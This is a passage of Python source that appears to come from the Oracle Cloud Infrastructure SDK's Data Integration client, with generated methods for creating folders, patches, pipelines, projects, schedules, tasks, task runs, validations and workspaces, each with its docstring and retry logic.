Folders are used to organize your design-time resources, such as tasks or data flows.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.CreateFolderDetails create_folder_details: (required)
The details needed to create a folder.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Folder`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_folder.py.html>`__ to see an example of how to use the create_folder API.
"""
resource_path = "/workspaces/{workspaceId}/folders"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_retry_token",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_folder got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_folder_details,
response_type="Folder")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_folder_details,
response_type="Folder")
def create_patch(self, workspace_id, application_key, create_patch_details, **kwargs):
"""
Creates a patch in an application.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param oci.data_integration.models.CreatePatchDetails create_patch_details: (required)
The details needed to create a patch in an application.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Patch`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_patch.py.html>`__ to see an example of how to use the create_patch API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/patches"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_patch got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_patch_details,
response_type="Patch")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_patch_details,
response_type="Patch")
def create_pipeline(self, workspace_id, create_pipeline_details, **kwargs):
"""
Creates a new pipeline in a project or folder ready for performing task orchestration.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.CreatePipelineDetails create_pipeline_details: (required)
The details needed to create a new pipeline.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Pipeline`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_pipeline.py.html>`__ to see an example of how to use the create_pipeline API.
"""
resource_path = "/workspaces/{workspaceId}/pipelines"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_retry_token",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_pipeline got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_pipeline_details,
response_type="Pipeline")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_pipeline_details,
response_type="Pipeline")
def create_pipeline_validation(self, workspace_id, create_pipeline_validation_details, **kwargs):
"""
Accepts the pipeline definition in the request payload and creates a pipeline validation.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.CreatePipelineValidationDetails create_pipeline_validation_details: (required)
The information needed to create the validation for the pipeline object.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.PipelineValidation`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_pipeline_validation.py.html>`__ to see an example of how to use the create_pipeline_validation API.
"""
resource_path = "/workspaces/{workspaceId}/pipelineValidations"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_pipeline_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_pipeline_validation_details,
response_type="PipelineValidation")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_pipeline_validation_details,
response_type="PipelineValidation")
def create_project(self, workspace_id, create_project_details, **kwargs):
"""
Creates a project. Projects are organizational constructs within a workspace that you use to organize your design-time resources, such as tasks or data flows. Projects can be organized into folders.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.CreateProjectDetails create_project_details: (required)
The details needed to create a project in a workspace.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Project`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_project.py.html>`__ to see an example of how to use the create_project API.
"""
resource_path = "/workspaces/{workspaceId}/projects"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_retry_token",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_project got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_project_details,
response_type="Project")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_project_details,
response_type="Project")
def create_schedule(self, workspace_id, application_key, create_schedule_details, **kwargs):
"""
Endpoint to create a new schedule.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param oci.data_integration.models.CreateScheduleDetails create_schedule_details: (required)
The request body parameter containing the schedule details.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Schedule`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_schedule.py.html>`__ to see an example of how to use the create_schedule API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/schedules"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_schedule got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_schedule_details,
response_type="Schedule")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_schedule_details,
response_type="Schedule")
def create_task(self, workspace_id, create_task_details, **kwargs):
"""
Creates a new task ready for performing data integrations. Specialized task types include data loader and integration tasks.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.CreateTaskDetails create_task_details: (required)
The details needed to create a new task.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Task`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_task.py.html>`__ to see an example of how to use the create_task API.
"""
resource_path = "/workspaces/{workspaceId}/tasks"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_retry_token",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_task got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_task_details,
response_type="Task")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_task_details,
response_type="Task")
def create_task_run(self, workspace_id, application_key, create_task_run_details, **kwargs):
"""
Creates a data integration task run for the specified task.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param oci.data_integration.models.CreateTaskRunDetails create_task_run_details: (required)
The details needed to create a task run.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.TaskRun`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_task_run.py.html>`__ to see an example of how to use the create_task_run API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/taskRuns"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_retry_token",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_task_run got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_task_run_details,
response_type="TaskRun")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_task_run_details,
response_type="TaskRun")
def create_task_schedule(self, workspace_id, application_key, create_task_schedule_details, **kwargs):
"""
Endpoint used to create a TaskSchedule.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param oci.data_integration.models.CreateTaskScheduleDetails create_task_schedule_details: (required)
The request body parameter containing the TaskSchedule details.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.TaskSchedule`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_task_schedule.py.html>`__ to see an example of how to use the create_task_schedule API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/taskSchedules"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_task_schedule got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_task_schedule_details,
response_type="TaskSchedule")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_task_schedule_details,
response_type="TaskSchedule")
def create_task_validation(self, workspace_id, create_task_validation_details, **kwargs):
"""
Validates a specific task.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.CreateTaskValidationDetails create_task_validation_details: (required)
The information needed to create a task validation.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.TaskValidation`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_task_validation.py.html>`__ to see an example of how to use the create_task_validation API.
"""
resource_path = "/workspaces/{workspaceId}/taskValidations"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_task_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_task_validation_details,
response_type="TaskValidation")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_task_validation_details,
response_type="TaskValidation")
def create_workspace(self, create_workspace_details, **kwargs):
"""
Creates a new Data Integration workspace ready for performing data integration tasks.
:param oci.data_integration.models.CreateWorkspaceDetails create_workspace_details: (required)
The information needed to create a new Data Integration workspace.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_workspace.py.html>`__ to see an example of how to use the create_workspace API.
"""
resource_path = "/workspaces"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_retry_token",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_workspace got unknown kwargs: {!r}".format(extra_kwargs))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_workspace_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_workspace_details)
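# Sketch (hypothetical OCIDs): this operation returns no body (response.data is
# None); workspace provisioning is asynchronous and is typically tracked via the
# opc-work-request-id response header (an assumption based on common OCI create
# semantics).
#
#   ws_resp = client.create_workspace(
#       oci.data_integration.models.CreateWorkspaceDetails(
#           compartment_id="ocid1.compartment.oc1..exampleuniqueID",
#           display_name="dev-workspace"))
#   work_request_id = ws_resp.headers.get("opc-work-request-id")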
def delete_application(self, workspace_id, application_key, **kwargs):
"""
Removes an application using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
